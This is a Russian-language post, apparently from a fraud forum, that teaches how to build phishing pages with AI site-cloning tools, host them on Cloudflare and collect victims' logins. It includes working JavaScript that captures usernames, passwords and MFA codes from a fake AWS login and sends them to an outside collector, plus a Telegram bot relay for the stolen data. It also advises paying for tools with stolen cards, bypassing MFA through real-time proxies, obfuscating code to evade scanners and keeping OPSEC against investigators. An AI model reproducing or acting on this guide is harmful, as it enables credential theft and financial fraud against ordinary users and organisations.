Professor
Professional
- Messages
- 1,769
- Reaction score
- 1,740
- Points
- 113
СОДЕРЖАНИЕ
- Введение: смерть традиционного фишинга
- Две фундаментальные проблемы: обфускация и расширяемость
- AI-революция: визуально-кодовый фишинг
- Арсенал клонирования: Orchids, Memma, Anima и Spiderman
- Пошаговое руководство: создание первой AI-фишинг-страницы
- Преимущество React: почему клиентский рендеринг побеждает сканеры
- Бэкенд: Cloudflare Workers, Telegram-боты и конвейеры учётных данных
- Прокси-метод: обход MFA в реальном времени с headless-браузерами
- Сборка и деплой: Vite, обфускация и Cloudflare Pages
- Продвинутые расширения: захват OTP, геотрекинг и перехват сессий
- Ограничения: что AI может и не может
- Будущее: GPT-6, поведенческое клонирование и растущий разрыв
- Обработка ошибок и устранение неполадок
- Анализ рисков и их минимизация
- Правила OPSEC для AI-фишинга
- Полный чек-лист
- Ключевые выводы
ГЛАВА 1: ВВЕДЕНИЕ — СМЕРТЬ ТРАДИЦИОННОГО ФИШИНГА
Представь: 3 часа ночи, ты сидишь перед компьютером с красными глазами, пытаясь разобрать HTML той заманчивой банковской страницы, которую пытаешься клонировать. Ты занимаешься этим часами — вручную копируешь исходный код, скачиваешь ресурсы, исправляешь битые ссылки. Но как бы ты ни старался, страница просто не загружается. Шрифты кривые, изображения возвращают 403, а CSS всё ещё не работает как надо.Наконец, после целой вечности отладки, всё готово. Ты загружаешь это на свой bulletproof-хостинг, запускаешь почтовую пушку и начинаешь материться.
И тут — БАМ!
В течение нескольких часов твой домен забанят, хостинг-провайдер заблокирует сайт, и вся работа уйдёт в никуда. Твоя красивая фишинг-страница умрёт. Твои мечты о лёгких деньгах рухнут.
Знакомо? Да, я так и думал.
Суть в том, что по мере усложнения инструментов обнаружения, твой подход должен становиться сложнее. Дни копирования HTML-кода и молитв богам фрода закончились.
Сегодня мы погружаемся в новое поколение фишинга — то, которое даёт максимальную расширяемость и обфускацию прямо из коробки. Фишеры, которые адаптируются на лету, имеют функции, недоступные ранее, и автоматически скрываются от назойливых сканеров безопасности.
Добро пожаловать в будущее. Поехали.
ГЛАВА 2: ДВЕ ФУНДАМЕНТАЛЬНЫЕ ПРОБЛЕМЫ — ОБФУСКАЦИЯ И РАСШИРЯЕМОСТЬ
Прежде чем перейти к новым технологиям, давай вспомним, как большинство из вас создаёт фишинг-страницы, и почему это не работает.2.1. Старый метод
| Шаг | Действие | Инструменты |
|---|---|---|
| 1 | Выбор цели | Банк, платёжный процессор, email-провайдер |
| 2 | Клонирование страницы | HTTrack, Save Page WE, Singlefile, Ctrl+S |
| 3 | Исправление ресурсов | Ручная замена URL, скачивание ресурсов |
| 4 | Настройка бэкенда | PHP-скрипт (скопированный с HackForums 2015) |
| 5 | Деплой | Бесплатный хостинг, взломанный WordPress |
| 6 | Распространение | Спам, SMS, соцсети |
2.2. Проблема №1: Обфускация (или её отсутствие)
Вот забавный факт: прямо сейчас, пока ты читаешь это, тысячи ботов сканируют интернет в поисках фишинг-страниц. Эти цифровые ищейки вынюхивают HTML-код, совпадающий с известными паттернами: логотип PayPal здесь, кнопка «Войти» там — бам, ты помечен.Почему им так легко? Серверный рендеринг.
Когда кто-то посещает твою фишинг-страницу, твой сервер отдаёт ему полный HTML. Каждый элемент, каждая строка, каждое подозрительное поле формы — всё в открытом тексте для парсинга ботами. Это как пытаться спрятать наркотики в прозрачном пластиковом пакете.
Компании по безопасности имеют огромные базы HTML-отпечатков легитимных сайтов. Когда твоя поддельная страница Bank of America выдаёт HTML, на 95% идентичный оригиналу, их алгоритмы загораются как рождественская ёлка. Твой домен попадает в чёрный список, а регистратор и хостинг автоматически уведомляются.
2.3. Проблема №2: Расширяемость (настоящий убийца)
Здесь традиционный фишинг особенно показывает свой возраст. Допустим, ты хочешь вывести фишинг на новый уровень и сделать его асинхронным.Что это значит? Вместо простого сбора данных и отправки сообщений, тебе нужно:
- Захватить логин/пароль жертвы
- Проверить их в реальном времени на настоящем сайте
- Когда срабатывает одноразовый пароль (OTP), динамически показать страницу запроса OTP
- Захватить OTP, пока жертва ещё на твоём сайте
- Получить прибыль с полным доступом к аккаунту
Звучит круто, правда? Удачи реализовать это со статичным HTML.
Тебе придётся реверс-инжинирить процесс аутентификации на сайте, извлечь и понять их JavaScript, перестроить стили для новой OTP-страницы и убедиться, что всё работает без сучка и задоринки.
ГЛАВА 3: AI-РЕВОЛЮЦИЯ — ВИЗУАЛЬНО-КОДОВЫЙ ФИШИНГ
Теперь начинается интересное. Что если я скажу тебе, что есть способ автоматически генерировать полностью расширяемую кодовую базу из любого сайта? Код, изначально скрытый от сканеров, позволяющий легко добавлять сложные функции и делающий твои фишеры практически необнаружимыми для традиционных методов сканирования?3.1. Как работает визуально-кодовый подход
Вместо HTML-файла с битыми ресурсами, современные AI-инструменты используют визуально-кодовый конвейер:- Визуальный анализ — AI анализирует скриншот или URL целевого сайта
- Структурное понимание — определяет компоненты (шапка, форма, подвал)
- Генерация кода — перестраивает с нуля как современное React-приложение
- Применение стилей — применяет Tailwind CSS и Shadcn UI
- Вывод — ты получаешь полностью функциональный React-проект
Это как если бы AI-разработчик перестраивал сайт для тебя, только этот разработчик не задаёт вопросов и работает бесплатно.
3.2. Модульный фронтенд-движок
Согласно исследованию безопасности фишинг-кита Spiderman, ключевая инновация — это модульный фронтенд-движок + динамическая бэкенд-прокси-архитектура. Панель управления кита предоставляет:| Функция | Описание |
|---|---|
| Библиотека шаблонов банков | 50+ скриншотов UI европейских банков, автоизвлечение CSS-стилей, шрифтов, позиций кнопок |
| Динамическое сопоставление полей | Автоопределение полей формы входа (username, password, otp) и генерация скриптов захвата |
| Помощник маскировки домена | Рекомендует домены с высоким сходством и автоматически генерирует SSL-сертификаты через ACME/Let's Encrypt |
| Дашборд логов в реальном времени | Показывает захваченные учётные данные, геолокацию, тип устройства, экспорт CSV в один клик |
«Это по сути SaaS-платформа для фишинг-сайтов», — отмечает эксперт по борьбе с фишингом Лу Ди. «Раньше создание фишинг-сайта занимало полдня. Теперь это быстрее, чем заказать еду.»
ГЛАВА 4: АРСЕНАЛ КЛОНИРОВАНИЯ
4.1. Orchids.app
Что это: Первый AI-конструктор приложений, который создаёт и разворачивает любое приложение, любой стек — веб, мобильные, Chrome-расширения, Slack-боты, AI-агенты.Ключевые функции:
- Визуальный анализ целевых сайтов
- Генерация React-кодовой базы
- Встроенный редактор VS Code
- Использование существующих AI-подписок (ChatGPT, Claude, Gemini)
Цена: Бесплатный план; премиум для безлимитных клонов.
4.2. Memma
Что это: Open-source CLI-инструмент визуально-кодового преобразования, конвертирующий сайты в React-компоненты.Ключевые функции:
- memma generate <source> — конвертирует URL или изображение в React-компоненты
- TypeScript-компоненты React
- Инлайн-стилизация Tailwind CSS
- Опция создания Next.js-проекта
- Поддержка локальных изображений
Установка:
Bash:
npm install -g memma
memma init
memma start
memma generate https://amazon.com/login
4.3. Anima
Что это: API-first инструмент, превращающий Figma-дизайны или живые сайты в чистый, production-ready код.Ключевые функции:
- Website to Code (URL → React)
- Только Tailwind CSS для сайтов
- Только Shadcn UI для сайтов
- Только TypeScript для сайтов
Пример SDK:
JavaScript:
const { generateCode } = require('@animaapp/anima-sdk');
await generateCode({
source: { url: 'https://amazon.com/login' },
settings: {
framework: 'react',
language: 'typescript',
styling: 'tailwind',
uiLibrary: 'shadcn'
}
});
4.4. Фишинг-кит Spiderman
Что это: Коммерческий фишинг-кит, продающийся в даркнете за $300-800/месяц.Ключевые функции:
- Zero-code, полный GUI, деплой в один клик
- Библиотека шаблонов банков (50+ европейских банков)
- Прокси-форвардинг в реальном времени для обхода MFA
- Генерация страницы за 10 секунд
- Поддержка 12 языков
Как это работает:
- Выбери целевой банк из GUI
- Выбери язык
- Введи фейковый домен
- Система генерирует фишинг-сайт за <10 секунд
- Прокси в реальном времени пересылает учётные данные настоящему банку
- Пользователь перенаправляется на страницу «техобслуживания»
ГЛАВА 5: ПОШАГОВОЕ РУКОВОДСТВО — СОЗДАНИЕ ПЕРВОЙ AI-ФИШИНГ-СТРАНИЦЫ
Давай испачкаем руки и клонируем Amazon как профессиональные дегенераты, которыми мы являемся.Шаг 1: Карди подписку Orchids.app
Для начала тебе понадобится аккаунт Orchids.app. Хотя у них есть бесплатный план, тебе нужен премиум для безлимитных клонов и лучших AI-моделей. Запусти свой любимый кардинг-сетап и зарегистрируй подписку. Если ты не можешь позволить себе SaaS-подписку за $20/месяц, тебе нечего делать в фишинге.Шаг 2: Привлеки цель
Зайди на страницу входа Amazon. Сделай скриншот или сохрани URL — он понадобится для Orchids.app.Шаг 3: Войны клонов
- Перейди на orchids.app
- Вставь URL Amazon или загрузи скриншот
- Смотри, как AI творит магию
Через несколько секунд у тебя будет React-проект, почти идентичный странице входа Amazon.
Шаг 4: Выбери оружие
Могут остаться артефакты, но у тебя есть два варианта тонкой настройки:Вариант A: Скачай и используй AI-IDE
- Скачай проект
- Открой в Cursor или Windsurf
- Используй естественный язык: «Сделай кнопку входа темнее» или «Исправь мобильную версию»
Вариант B: Используй встроенный редактор Orchids.app
- Останься в Orchids.app
- Используй функцию подсказок: «Совпадение с оранжевым цветом Amazon» или «Добавь логотип безопасности из оригинала»
Шаг 5: Быстрый бэкенд (тестирование)
Настройка полноценного бэкенда описана в Главе 7. Пока используй webhook.site:- Перейди на webhook.site
- Получи свой уникальный URL
- Попроси Orchid заменить action формы на этот URL
Это только для тестирования.
Шаг 6: Добавление продвинутых функций
Хочешь добавить захват OTP? Просто покажи Orchids.app (или Cursor) скриншот OTP-страницы Amazon и скажи «Добавь это как новый компонент».AI сгенерирует компонент, который автоматически унаследует все стили Amazon: цвета, шрифты, отступы. Он будет выглядеть нативно, потому что вся твоя кодовая база уже правильно тематизирована.
Шаг 7: Сборка и деплой
Bash:
npm run build
Это создаст оптимизированную, обфусцированную production-сборку.
Для хостинга? Просто создай новый проект Cloudflare Pages, загрузи папку dist напрямую и смотри, как твоя фишинг-страница оживает.
Сгенерированные файлы — это минифицированный JavaScript. Никаких очевидных HTML-форм для сканеров. Только скомпилированный React-код, который может быть любым веб-приложением!
ГЛАВА 6: ПРЕИМУЩЕСТВО REACT — ПОЧЕМУ КЛИЕНТСКИЙ РЕНДЕРИНГ ПОБЕЖДАЕТ СКАНЕРЫ
6.1. Как работает клиентский рендеринг
Поскольку Orchids.app генерирует React-приложение, твоя фишинг-страница больше не рендерится как статичный HTML. Вместо этого:| Функция | Как работает |
|---|---|
| Клиентский рендеринг | Браузер получает JavaScript, который динамически рендерит страницу |
| Компонентная архитектура | Форма входа генерируется React-компонентами во время выполнения |
| Обфускация при сборке | Vite-плагины для минификации, tree shaking, кастомной обфускации |
6.2. Что видят сканеры
Сканеры ищут:
HTML:
<form action="login">
Они ничего не найдут, потому что твоя форма генерируется на стороне клиента с JavaScript, который выглядит как алфавитный суп.
| Что ищут сканеры | Что они находят |
|---|---|
| Статичные HTML-формы | JavaScript-бандлы |
| Известные паттерны | Минифицированный React-код |
| Ссылки на оригинальный домен | Обфусцированные строки |
| Подозрительные поля форм | Компоненты, генерируемые во время выполнения |
6.3. Реальный пример
В марте 2026 года фишинговая кампания использовала React-based SPA, размещённое на домене Cloudflare Workers, для имитации Dropbox Transfer. HTML фишинг-страницы был минимальным, а интерфейс динамически рендерился через bundled JavaScript-файл, содержащий React runtime и логику приложения.Этот SPA-подход необычен для фишинг-китов, которые обычно используют статичный HTML, что делает анализ и обнаружение более сложными.
ГЛАВА 7: БЭКЕНД — CLOUDFLARE WORKERS, TELEGRAM-БОТЫ И КОНВЕЙЕРЫ УЧЁТНЫХ ДАННЫХ
7.1. Инфраструктурный стек Cloudflare
Согласно исследованию безопасности Cloudflare-хостинга AWS-фишинга, атакующие используют три бесплатных сервиса Cloudflare:| Сервис | Роль | Формат домена |
|---|---|---|
| Cloudflare Pages | Хостинг статичной фишинг-страницы | xxx.pages.dev |
| Cloudflare Workers | Прокси-слой man-in-the-middle | xxx.workers.dev |
| Cloudflare Tunnel | Туннелирование скрытого бэкенда | trycloudflare.com |
7.2. Полная настройка инфраструктуры (5 минут)
- Зарегистрируй анонимный аккаунт Cloudflare
- Включи Pages, Workers, R2 storage, Tunnel
- Скачай open-source фишинг-кит
- Загрузи статичные страницы в Pages
- Задеплой прокси-скрипт Workers
- Включи Tunnel для бэкенда
- Сгенерируй фишинг-ссылки
Никаких платежей, никакой верификации личности, 5 минут до запуска полной фишинг-инфраструктуры.
7.3. Логика прокси Workers
Скрипт Workers действует как посредник:
JavaScript:
// JS-сниппет кражи учётных данных AWS-фишинг-страницы
const submitForm = document.getElementById("aws-login-form");
submitForm.addEventListener("submit", async function(e) {
e.preventDefault();
const user = document.getElementById("username").value;
const pwd = document.getElementById("password").value;
const mfa = document.getElementById("mfa-code").value;
// Отправка данных через прокси Cloudflare Workers
await fetch("https://aws-proxy-xxx.workers.dev/collect", {
method: "POST",
headers: {"Content-Type": "application/json"},
body: JSON.stringify({
aws_user: user,
aws_pwd: pwd,
mfa_token: mfa,
device: navigator.userAgent,
timestamp: new Date().getTime()
})
});
// Перенаправление на настоящую консоль AWS для устранения подозрений
window.location.href = "https://console.aws.amazon.com";
});
Ключевая логика обмана: После отправки учётных данных автоматически перенаправляй на настоящую консоль AWS. Жертва не воспримет никакой аномалии и не сохранит в памяти доступ к ненормальной странице, что значительно повышает успех атаки.
7.4. Интеграция Telegram-бота
Для уведомлений о учётных данных в реальном времени используй Cloudflare Workers с Telegram Bot API:
JavaScript:
// Cloudflare Worker для уведомлений Telegram
addEventListener('fetch', event => {
event.respondWith(handleRequest(event.request))
})
async function handleRequest(request) {
const data = await request.json()
await fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
chat_id: CHAT_ID,
text: `Новые учётные данные: ${JSON.stringify(data)}`
})
})
return new Response('OK')
}
7.5. Альтернативная эксфильтрация: EmailJS
В марте 2026 года кампания использовала EmailJS — легитимный API email-сервиса — для эксфильтрации учётных данных. Вместо отправки данных на контролируемую атакующим инфраструктуру, учётные данные отправлялись напрямую по email через клиентский JavaScript.Это обходит традиционные методы сетевого обнаружения, потому что трафик идёт к легитимному сервису.
ГЛАВА 8: ПРОКСИ-МЕТОД — ОБХОД MFA В РЕАЛЬНОМ ВРЕМЕНИ
8.1. Как работает Starkiller
Новый фреймворк Starkiller использует другой подход. Он запускает headless Chrome внутри Docker-контейнера, загружает настоящий сайт бренда и действует как обратный прокси между целью и легитимным сайтом.Получатели обслуживаются подлинным контентом страницы напрямую через инфраструктуру атакующего, гарантируя, что фишинг-страница никогда не устареет.
8.2. Объяснение обхода MFA
Поскольку конечный пользователь фактически аутентифицируется на настоящем сайте через прокси, любые одноразовые коды или токены аутентификации, которые он отправляет, пересылаются легитимному сервису в реальном времени. Атакующий захватывает результирующие session cookies и токены, получая аутентифицированный доступ к аккаунту.Когда атакующие ретранслируют весь процесс аутентификации в реальном времени, защиты MFA могут быть эффективно нейтрализованы, несмотря на то, что они функционируют точно как задумано.
8.3. Функции Starkiller
| Функция | Описание |
|---|---|
| Мониторинг сессии в реальном времени | Live-стрим экрана цели |
| Захват кейлоггера | Каждое нажатие клавиши |
| Кража cookie/session token | Прямой захват аккаунта |
| Геотрекинг | Местоположение цели |
| Telegram-алерты | Автоматические уведомления |
| Аналитика кампании | Счётчики посещений, конверсии |
ГЛАВА 9: СБОРКА И ДЕПЛОЙ — VITE, ОБФУСКАЦИЯ И CLOUDFLARE PAGES
9.1. Процесс сборки
Bash:
npm run build
Это создаёт:
- Минифицированный JavaScript
- Обфусцированный код
- Оптимизированные ресурсы
- Production-ready файлы
9.2. Продвинутая обфускация
Для максимальной защиты исходников используй javascript-obfuscator с высокобезопасными параметрами:
Bash:
javascript-obfuscator input.js --output output.js \
--self-defending \
--string-array-encoding base64 \
--string-array-threshold 0.75
| Параметр | Эффект |
|---|---|
| --self-defending | Предотвращает запуск кода при вмешательстве |
| --string-array-encoding base64 | Скрывает чувствительные строки |
| --string-array-threshold 0.75 | Обфусцирует 75% всех строк |
9.3. Деплой на Cloudflare Pages
- Создай новый проект Cloudflare Pages
- Загрузи папку dist
- Настрой кастомный домен
- Включи SSL
- Используй Turnstile для фильтрации ботов
Почему Cloudflare?
- Бесплатный тариф
- Глобальный CDN
- DDoS-защита
- Workers для serverless-бэкенда
ГЛАВА 10: ПРОДВИНУТЫЕ РАСШИРЕНИЯ
10.1. Захват OTP
| Шаг | Действие |
|---|---|
| 1 | Покажи AI скриншот OTP-страницы |
| 2 | Скажи «Добавь это как новый компонент» |
| 3 | AI генерирует компонент с совпадающими стилями |
| 4 | Подключи к бэкенду для захвата в реальном времени |
10.2. Геотрекинг
Фишинг-скрипт запрашивает Geoapify IP geolocation API для сбора географических метаданных жертвы, которые отправляются вместе с учётными данными атакующим.10.3. Перехват сессий
Когда Starkiller проксирует живые потоки аутентификации, он захватывает session cookies и токены. Они могут использоваться для:- Прямого захвата аккаунта
- Латерального перемещения внутри организаций
- Follow-on атак
- Сбора email для дальнейшего фишинга
10.4. Сбор email
Собранные email из скомпрометированных сессий могут обеспечить follow-on атаки, которые распространяются латерально по организации.ГЛАВА 11: ОГРАНИЧЕНИЯ — ЧТО AI МОЖЕТ И НЕ МОЖЕТ
Прежде чем ты убежишь, думая, что у тебя всё отлично с новым AI-фишинг-китом, позволь немного разочаровать тебя.11.1. Что AI не сделает идеально
| Проблема | Частота |
|---|---|
| Нет интерактивных элементов | Часто |
| Неправильные цвета/отступы | Часто |
| Некорректный адаптивный дизайн | Иногда |
| Нет hover-состояний | Часто |
| Нет анимаций | Часто |
11.2. Как исправить
Используй функцию подсказок Orchids.app для уточнения:- «Сделай кнопку входа того же оттенка красного, что и оригинал»
- «Добавь hover-выпадающее меню»
- «Исправь мобильную вёрстку, чтобы она была вертикальной»
11.3. Правило 80/20
Думай об этом как о 80% пути, пройденных автоматически, с последними 20%, требующими твоей креативности.Это всё ещё быстрее и надёжнее, чем копирование сложных страниц и возня с нуля, но не ожидай идеального клона 1:1 без некоторой работы.
11.4. Ограничения динамического контента
Сайты, загружающие контент через JavaScript, могут не клонироваться полностью. AI-инструменты захватывают то, что видно при начальной загрузке страницы.Страницы за логином: AI может получить доступ только к публичным страницам по умолчанию. Контент за аутентификацией не будет захвачен.
ГЛАВА 12: БУДУЩЕЕ — GPT-6, ПОВЕДЕНЧЕСКОЕ КЛОНИРОВАНИЕ И РАСТУЩИЙ РАЗРЫВ
12.1. Что нас ждёт
Но вот прекрасная часть: это только стартовая линия, а не финишная. AI развивается с головокружительной скоростью.| Временная шкала | Возможность |
|---|---|
| Сегодня | 5-10 итераций для идеального клона |
| 6 месяцев | 2-3 итерации |
| 1 год | Автоматическое совершенство |
| 2 года | Полное поведенческое клонирование |
12.2. Грядущая революция
Мы быстро приближаемся к будущему, где ты можешь вставить URL, нажать Enter и получить пиксель-в-пиксель клон, неотличимый от оригинала. Каждое микровзаимодействие, каждый hover-эффект, каждая адаптивная точка — всё захвачено и воссоздано безупречно в одной командной строке.AI поймёт не только то, как сайт выглядит, но и то, как он ведёт себя.
12.3. GPT-6 и beyond
Думаешь, GPT-4 умный? Подожди, пока GPT-6 сможет анализировать весь пользовательский поток сайта, понимать его логику аутентификации и воссоздавать не только визуальный дизайн, но и весь пользовательский опыт.Мы говорим об AI, который будет реверс-инжинирить сложные веб-приложения и создавать production-ready фишинг-платформы, которые даже оригинальные разработчики не смогут отличить.
12.4. Растущий разрыв
Это руководство представляет первую волну по-настоящему интеллектуальных фишинг-инструментов. К тому времени, как большинство новичков разберутся, как правильно использовать Orchids.app, следующее поколение AI сделает сегодняшние инструменты похожими на наскальные рисунки.Оставайся впереди кривой, потому что этот технологический разрыв будет только расти. Ранние последователи будут пировать, пока динозавры всё ещё борются с битыми копиями HTML.
12.5. Влияние Spiderman
Кит Spiderman знаменует переход фишинга от «ремесленной мастерской» к «промышленному конвейеру». Обычным преступникам не нужно знать HTML, JavaScript или даже арендовать сервер — просто заплати кредиткой, чтобы запустить трансграничное финансовое мошенничество.12.6. Влияние Starkiller
Низкий технический барьер Starkiller делает его особенно опасным для защитников. Панель point-and-click не требует знаний обратных прокси или сертификатов, давая низкоквалифицированным атакующим фишинг-возможности корпоративного уровня.ГЛАВА 13: ОБРАБОТКА ОШИБОК И УСТРАНЕНИЕ НЕПОЛАДОК
13.1. Ошибка: AI-клон выглядит неправильно
Причины: Сложная структура страницы, динамический контент, ограничения AIРешение: Используй функцию подсказок, ручное редактирование, несколько итераций
13.2. Ошибка: Форма не отправляется
Причины: Неправильный URL action, проблемы CORS, ошибки JavaScriptРешение: Проверь URL action, настрой CORS, отладь JavaScript
13.3. Ошибка: Домен забанен
Причины: Обнаружен сканерами, сообщён жертвами, в чёрном спискеРешение: Новый домен, лучшая обфускация, защита Cloudflare
13.4. Ошибка: OTP не захватывается
Причины: Бэкенд не подключён, неправильная логика потока, проблемы таймингаРешение: Проверь бэкенд, пересмотри поток, настрой тайминг
ГЛАВА 14: АНАЛИЗ РИСКОВ И ИХ МИНИМИЗАЦИЯ
14.1. Риски
| Риск | Вероятность | Минимизация |
|---|---|---|
| Бан домена | Высокая | Ротация |
| Обнаружение | Средняя | Обфускация |
| Компрометация бэкенда | Средняя | Шифрование |
| Юридические проблемы | Средняя | VPN, OPSEC |
14.2. Методы обнаружения для обхода
Согласно CGI AntiPhish, системы обнаружения анализируют:| Слой | Что анализируется |
|---|---|
| Визуальный | Фронтальная страница и визуальные элементы сайта |
| Исходный | Хост, расположение, исходный код |
| Мета | Сертификат и его домены |
Защита: Клиентский рендеринг побеждает визуальный анализ, обфускация побеждает анализ исходников, Cloudflare побеждает мета-анализ.
ГЛАВА 15: ПРАВИЛА OPSEC ДЛЯ AI-ФИШИНГА
- Всегда используй VPN
- Никогда не используй реальную личность
- Ротируй домены
- Шифруй данные
- Используй крипто-платежи
- Никогда не храни улики
- Используй Cloudflare для анонимности
- Разделяй инфраструктуру для каждой кампании
ГЛАВА 16: ПОЛНЫЙ ЧЕК-ЛИСТ
Перед началом:
- □ Аккаунт Orchids.app (премиум)
- □ Кардинг-сетап для подписки
- □ URL/скриншот цели
- □ AI-IDE (Cursor/Windsurf)
- □ Аккаунт Cloudflare
- □ VPN активен
Клонирование:
- □ Цель проанализирована
- □ Клон сгенерирован
- □ Артефакты исправлены
- □ Функции добавлены
- □ Бэкенд подключён
Деплой:
- □ Сборка завершена
- □ Обфускация применена
- □ Cloudflare Pages настроен
- □ Домен сконфигурирован
- □ SSL включён
- □ Turnstile включён
После деплоя:
- □ Мониторинг активен
- □ Telegram-бот настроен
- □ Учётные данные поступают
- □ Ротация доменов готова
- □ Бэкапы на месте
- □ OPSEC соблюдён
ГЛАВА 17: КЛЮЧЕВЫЕ ВЫВОДЫ
Фишинг развивается, нравится тебе это или нет. Старые методы устаревают.Это твой призыв к действию. Инструменты существуют, методы проверены, и единственное, что стоит между тобой и фишингом нового уровня — твоя готовность изучить основы React.
Ключевые выводы:
- Традиционный фишинг мёртв — слишком медленный, слишком обнаружимый
- AI-клонирование — это будущее — Orchids, Memma, Anima, Spiderman
- React-кодовая база = расширяемость — добавь любую функцию
- Клиентский рендеринг = обфускация — сканеры ничего не видят
- Cloudflare Pages = деплой — быстро, бесплатно, защищено
- Прокси-метод = обход MFA — подход Starkiller
- Разрыв растёт — ранние последователи побеждают
Финальное слово:
Большинство продолжит использовать свои битые HTML-коды. Но для тех, кто готов эволюционировать и принять новые технологии, награды будут там.Помни: в этой игре ты либо инновируешь, либо проиграешь.
Будь осторожен, продолжай учиться и, ради всего святого, используй VPN.
Удачи, брат. Если что — задавай вопросы.